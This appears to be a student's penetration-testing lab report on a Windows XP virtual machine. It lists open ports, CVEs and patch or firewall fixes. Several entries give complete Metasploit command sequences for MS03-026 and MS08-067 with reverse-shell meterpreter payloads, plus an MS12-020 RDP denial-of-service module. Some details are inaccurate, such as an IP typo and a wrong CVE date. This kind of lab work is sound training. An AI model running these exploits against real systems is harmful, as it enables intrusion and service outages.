====================================================================================================
Potential Vulnerability 1:

	Description:
		There does not appear to be a vulnerability
	
	Date Found/Released onto CVE (YYYY-MM-DD): N/A
	CVE: N/A
	Port: 22
	Platform: Windows
	Target Systems: Windows 2000/XP/2003 SP1, SP2, SP3
	References: N/A
	
The system is not exploitable:
	C: Some version of the service are vulnerable, this one is not.
	
		I searched: YOUR ANSWER HERE (PROVIDE LINKS)
			- https://www.rapid7.com/db/modules/exploit/windows/ssh/sysax_ssh_username
			- https://www.rapid7.com/db/modules/exploit/windows/ssh/putty_msg_debug
			- https://www.rapid7.com/db/modules/exploit/windows/ssh/freesshd_key_exchange
			- https://www.rapid7.com/db/modules/exploit/windows/ssh/freeftpd_key_exchange
			- https://www.rapid7.com/db/modules/exploit/linux/ssh/exagrid_known_privkey
			- https://www.rapid7.com/db/modules/exploit/windows/http/minishare_get_overflow
			
		Vulnerable versions include: YOUR ANSWER HERE (LINKS)
			# I tried running all the metasploit modules listed above, none of them worked
			
			- Putty (v0.53 or less)
			- Sysax (v5.53 or less)
			- FreeSSHd (v1.09)
			- FreeFTPd (v1.0.10)
			- ExaGrid (v4.8 or less)
			- Minishare (v.1.4.2 or less)
		
		The system is using version: YOUR ANSWER HERE (HOW DID YOU FIND THIS)
			- Putty (v0.58)
				- The exploit does not work on this version
			- Sysax (not installed on system)
			- FreeSSHd (not installed on system)
			- FreeFTPd (not installed on system)
			- ExaGrid (not installed on system)
			- Minishare (not installed on system)
====================================================================================================
Potential Vulnerability 2:

	Description:
		This vulnerability buffer overflows a DCOM interface for windows RPC. Through the overflow
		a hacker can execute arbitrary code through a windows shell or other means.
	
	Date Found/Released onto CVE (YYYY-MM-DD): 2003-08-18
	CVE: https://www.cvedetails.com/cve/cve-2003-0352
	Port: 135
	Platform: Windows
	Target Systems: Windows NT SP3-6a/2000/XP/2003 Universal
	
	References:
		- https://www.rapid7.com/db/modules/exploit/windows/dcerpc/ms03_026_dcom
		- https://www.cvedetails.com/cve/cve-2003-0352
		
The system is exploitable:
	B: Below is an MSF script to exploit it

		msfconsole 
		use exploit/windows/dcerpc/ms03_026_dcom
		set RHOST 192.168.0.33
		set LHOST 192.1680.117
		set PAYLOAD windows/meterpreter/reverse_tcp
		exploit

	C: Below explain ways one fixes the VM. 

		Microsoft released a statement and patch for this issue. Since our system is still
		vulnerable that means we have not downloaded this security update. The link to the official 
		patch and security bulletin post is below.
		
		- https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2003/ms03-026
		
		We can also prevent this exploit by turning this port and service off if we're not using 
		it. Change the appropriate settings in the firewall as needed
====================================================================================================
Potential Vulnerability 3:

	Description:
		This vulnerability exploits a cannonical naming exploit in the NetAPI32.dll file through
		the server service. Through this exploit the hacker can gain shell access to the machine
		they have exploited.
	
	Date Found/Released onto CVE (YYYY-MM-DD): 2008-03-28
	CVE: https://www.cvedetails.com/cve/cve-2008-4250
	Port: 139
	Platform: Windows
	Target Systems: Windows 2000/XP/2003 SP1, SP2, SP3
	
	References:
		- https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
		- https://www.cvedetails.com/cve/cve-2008-4250
		
The system is exploitable:
	B: Below is an MSF script to exploit it

		msfconsole 
		use exploit/windows/smb/ms08_067_netapi
		set RHOST 192.168.0.33
		set RPORT 139
		set LHOST 192.168.0.117
		set PAYLOAD windows/meterpreter/reverse_tcp
		set SMBDIRECT false
		exploit

	C: Below explain ways one fixes the VM. 

		Microsoft released a statement and patch for this issue. Since our system is still
		vulnerable that means we have not downloaded this security update. The link to the official 
		patch and security bulletin post is below.
		
		- https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067
		
		We can also prevent this exploit by turning this port and service off if we're not using 
		it. Change the appropriate settings in the firewall as needed
====================================================================================================
Potential Vulnerability 4:

	Description:
		This vulnerability uses the same vulernability as the previous exploit. It exploits the 
		NetAPI32.dll file. Ultimately this exploit allows the hacker to gain shell access to the 
		machine.
	
	Date Found/Released onto CVE (YYYY-MM-DD): 2008-03-28
	CVE: https://www.cvedetails.com/cve/cve-2008-4250
	Port: 445
	Platform: Windows
	Target Systems: Windows 2000/XP/2003 SP1, SP2, SP3
	
	References:
		- https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
		- https://www.cvedetails.com/cve/cve-2008-4250
		- http://www.binarytides.com/hack-windows-xp-metasploit/
		
The system is exploitable:
	B: Below is an MSF script to exploit it
	   # The exploit is the same except for one distinction, we don't set the SMBDIRECT variable to
	   # false. By default the exploit should choose port 445, but I have also explicitly set it
	
		msfconsole 
		use exploit/windows/smb/ms08_067_netapi
		set RHOST 192.168.0.33
		set RPORT 445
		set LHOST 192.168.0.117
		set PAYLOAD windows/meterpreter/reverse_tcp
		set SMBDIRECT false
		exploit

	C: Below explain ways one fixes the VM. 

		Microsoft released a statement and patch for this issue. Since our system is still
		vulnerable that means we have not downloaded this security update. The link to the official 
		patch and security bulletin post is below.
		
		- https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067
		
		We can also prevent this exploit by turning this port and service off if we're not using 
		it. Change the appropriate settings in the firewall as needed
====================================================================================================
Potential Vulnerability 5:

	Description:
		There was no exploit found on port 1025. At first I thought that an exploit existed since
		port 1025 and 135 are running the same service, but there does not appear to be a 
		metasploit exploit
	
	Date Found/Released onto CVE (YYYY-MM-DD): N/A
	CVE: N/A
	Port: 1025
	Platform: Windows
	Target Systems: Windows 2000/XP/2003 SP1, SP2, SP3
	
	References: N/A
	
The system is not exploitable:

	I could not find any exploits for this. This may be because the port may be configured to 
	handle traffic differently (aka firewall rules).

	C: Some version of the service are vulnerable, this one is not.
	
		I searched: YOUR ANSWER HERE (PROVIDE LINKS)
			- https://www.rapid7.com/db/modules/exploit/windows/dcerpc/ms03_026_dcom
			- https://www.rapid7.com/db/modules/exploit/windows/dcerpc/ms07_029_msdns_zonename
			- https://blog.rapid7.com/2009/12/28/exploiting-microsoft-iis-with-metasploit/
			- https://blog.rapid7.com/2014/02/03/new-ms08-067/
			- https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
			
		Vulnerable versions include: YOUR ANSWER HERE (LINKS)
			- Windows XP 
		
		The system is using version: YOUR ANSWER HERE (HOW DID YOU FIND THIS)
			- Windows XP SP1
	
====================================================================================================
Potential Vulnerability 6:

	Description:
		This exploit sends malicious RDP packets to the target system and makes it blue screen.
		Setting this exploit in a script that hits the machine at set intervals can allow the 
		hacker to cause complete denail and access to the system as long as the target has 
		Remote Desktop turned on.
	
	Date Found/Released onto CVE (YYYY-MM-DD): 2008-03-28
	CVE: https://www.cvedetails.com/cve/cve-2012-0002
	Port: 3389
	Platform: Windows
	Target Systems: Windows 2000/XP/2003 SP1, SP2, SP3
	
	References:
		- https://www.rapid7.com/db/vulnerabilities/WINDOWS-HOTFIX-MS12-020
		- https://www.cvedetails.com/cve/cve-2012-0002
		
The system is exploitable:
	B: Below is an MSF script to exploit it
	 
		msfconsole 
		use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
		set RHOST 192.168.0.33
		exploit

	C: Below explain ways one fixes the VM. 

		Microsoft released a statement and patch for this issue. Since our system is still
		vulnerable that means we have not downloaded this security update. The link to the official 
		patch and security bulletin post is below.
		
		- https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-020
		
		We can also prevent this exploit by turning this port and service off if we're not using 
		it. Change the appropriate settings in the firewall as needed. If the target machine does 
		not have Remote Desktop turned on (it is turned off by default) the target is not at risk.
====================================================================================================
Potential Vulnerability 7:

	Description:
		This exploit takes advantage of the fact that Windows does not validate the location or 
		contents of the NOTIFY packet (that is sent via HTTP through the use of UPnP). Since the 
		location or data are not verified we can allow the UPnP service to consume all system 
		resources. This is essentially a denial of service (DoS) attack on the compromised machine.
	
	Date Found/Released onto CVE (YYYY-MM-DD): 2001-12-20
	CVE: https://www.cvedetails.com/cve/cve-2001-0877
	Port: 5000
	Platform: Windows
	Target Systems: Windows 2000/XP/2003 SP1
	
	References:
		- https://www.cvedetails.com/cve/cve-2001-0877
		- https://www.rapid7.com/db/vulnerabilities/HTTP-UPNP-0002
		
The system is exploitable:

	A: I can't seem to find a way to exploit is using MSF.
		
		I searched for exploits in the msfconsole, but could not find any that were targeted 
		towards the Windows XP operating system. Searching through the rapid7 DB, there were 
		exploits available there, but there was no associated metasploit modules that would work.
	
		Below is the output of the metasploit search for 'upnp'
	
		auxiliary/admin/upnp/soap_portmapping                             normal     UPnP IGD SOAP Port Mapping Utility
		auxiliary/dos/upnp/miniupnpd_dos                     2013-03-27   normal     MiniUPnPd 1.4 Denial of Service (DoS) Exploit
		auxiliary/scanner/upnp/ssdp_amp                                   normal     SSDP ssdp:all M-SEARCH Amplification Scanner
		auxiliary/scanner/upnp/ssdp_msearch                               normal     UPnP SSDP M-SEARCH Information Discovery
		exploit/linux/http/dlink_upnp_exec_noauth            2013-07-05   normal     D-Link Devices UPnP SOAP Command Execution
		exploit/linux/http/realtek_miniigd_upnp_exec_noauth  2015-04-24   normal     Realtek SDK Miniigd UPnP SOAP Command Execution
		exploit/linux/upnp/dlink_upnp_msearch_exec           2013-02-01   excellent  D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection
		exploit/linux/upnp/miniupnpd_soap_bof                2013-03-27   normal     MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution
		exploit/multi/upnp/libupnp_ssdp_overflow             2013-01-29   normal     Portable UPnP SDK unique_service_name() Remote Code Execution
		exploit/osx/mdns/upnp_location                       2007-05-25   average    Mac OS X mDNSResponder UPnP Location Overflow

		Some additional links that I used to determine if there was any possibility of an exploit
		are the following:
			
			- https://www.rapid7.com/db/vulnerabilities/HTTP-UPNP-0002
			- https://www.rapid7.com/db/modules/exploit/windows/smb/ms05_039_pnp
			- https://www.rapid7.com/db/modules/exploit/windows/smb/ms09_050_smb2_negotiate_func_index
			- https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
		
		